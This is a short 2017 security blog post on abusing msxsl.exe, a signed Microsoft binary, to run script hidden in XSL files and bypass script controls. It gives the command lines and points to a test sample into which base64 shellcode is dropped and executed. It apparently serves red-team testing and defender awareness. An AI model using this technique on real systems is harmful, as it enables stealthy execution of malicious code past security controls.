Friday, August 25, 2017

msxsl.exe Working As Designed.

So, I recently was exploring XSL, and injection and came across several interesting references.

<msxsl:script> Element

XSLT Script Block Sample

The basic gist, and what I think is interesting is that you can host/execute scripts inside trusted signed binaries that ingest XML.

So, here is an example, a tool called msxsl.exe.

You can download it here:

1. start /b msxsl.exe customers.xml report.xsl
2. start /b msxsl.exe report.xsl
3. start /b msxsl.exe customers.xml

The sample code above just show a very basic example.   If you look at the parameters accepted, either the xml or xsl file can be a url.

So, msxsl.exe while not default, may exist in your fleet, and it packs a powerful punch. It is a trusted binary that can be used to bypass some script controls.

Here again, you have a tool, that is working as designed, yet gives has functionality that can easily circumvent many controls.

By that I mean, execution events are likely not being noticed.... And it allows you to load and execute vbs/js and more...

I recently updated a sample you can use for testing.  So, I using the amazing DotNetToJscript, all you need is to update the base64 shell code here and you can execute in the context of msxsl.exe.  Keep in mind its a 32 bit application.

MSXSL Test Cases

You could easily base64 encode and deliver this script host runner too.  Its small but packs a big punch ;-)


Thats all.  Short and simple.


Casey Smith